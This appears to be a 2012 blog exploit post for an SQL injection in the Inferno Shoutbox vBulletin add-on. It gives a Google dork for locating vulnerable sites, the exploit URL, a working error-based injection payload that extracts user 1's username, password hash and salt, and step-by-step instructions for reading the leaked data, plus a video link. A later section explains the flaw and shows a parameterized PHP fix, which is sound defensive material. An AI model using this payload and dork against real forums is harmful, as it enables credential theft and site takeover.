Sunday, August 19, 2012

infernoshout.php & inferno_settings.php

Search Google for:

Dork : inurl:infernoshout.php


Vulnerable code
--------------------------------------------------------------------------

$commands = unserialize($this->settings['s_commands']);

// No shoutbox row for this user yet: create one.
if ($this->vbulletin->db->affected_rows() < 1 && !$this->vbulletin->db->query_first("select * from " . TABLE_PREFIX . "infernoshoutusers where s_user='{$this->vbulletin->userinfo['userid']}'"))
{
    // serialize($commands) is concatenated into the quoted value without escaping.
    $this->vbulletin->db->query("
        insert into " . TABLE_PREFIX . "infernoshoutusers
        (s_user, s_commands)
        values
        ({$this->vbulletin->userinfo['userid']}, '" . serialize($commands) . "')
    ");
}
-------------------------------------------------------------------------

Exploit link
http://site.com/infernoshout.php?do=options&area=commands

-------------------------------------------------------------------------
SQL Injection Code :

-------------------------------------------------------------------------

' and (select 1 from (select count(*),concat((select(select concat(cast(concat(username,0x3a,password,0x3a,salt) as char),0x7e)) from user where userid=1 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND ''='#

--------------------------------------------------------------------------

Insert the SQL injection into the first "Command Input" box and enter anything into the first "Command Output" box, then hit save settings. You will be greeted with a database error. View the page source and scroll to the bottom of the page; you will see some quoted text containing the data you want.
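
The insert shown under "Vulnerable code" builds its SQL by concatenation, so a single quote in a saved command ends the string literal early. As an added example (not Inferno Shoutbox or vBulletin code), the sketch below reproduces that pattern next to a parameterized version; PDO with an in-memory SQLite database stands in for vBulletin's database layer, and the function names and sample input are constructed for illustration.

```php
<?php
// Added example: stand-alone sketch, not Inferno Shoutbox or vBulletin code.
// Table and column names mirror the snippet on this page; PDO/SQLite is an
// assumption standing in for vBulletin's own database class.

function make_db(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE infernoshoutusers (s_user INTEGER PRIMARY KEY, s_commands TEXT)');
    return $db;
}

// "Before": same pattern as the page's snippet, serialized input concatenated into SQL.
function save_commands_unsafe(PDO $db, $userid, array $commands): void {
    $db->exec("INSERT INTO infernoshoutusers (s_user, s_commands)
               VALUES ({$userid}, '" . serialize($commands) . "')");
}

// "After": both values travel as bound parameters, never as SQL text.
function save_commands_safe(PDO $db, $userid, array $commands): void {
    $stmt = $db->prepare('INSERT INTO infernoshoutusers (s_user, s_commands) VALUES (?, ?)');
    $stmt->execute([(int) $userid, serialize($commands)]);
}

// Constructed input: one harmless apostrophe in a "Command Input" value.
$commands = ["it's" => 'hello'];

$db = make_db();
try {
    save_commands_unsafe($db, 1, $commands);
    echo "unsafe: stored\n";
} catch (PDOException $e) {
    // The apostrophe closed the string literal, so the remainder was parsed as SQL.
    echo "unsafe: query broke\n";
}

// The parameterized insert stores the same value intact and it unserializes back.
save_commands_safe($db, 1, $commands);
$row = $db->query('SELECT s_commands FROM infernoshoutusers WHERE s_user = 1')->fetchColumn();
var_dump(unserialize($row) === $commands);
```

In vBulletin the direct equivalent is to pass the serialized string through `$this->vbulletin->db->escape_string()` and cast the user id to an integer before building the query.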

-------------------------------------------------------------------------

Video Tutorial :

http://www.youtube.com/watch?v=g70_JaKnBbw


------------------------------------------------------------------------
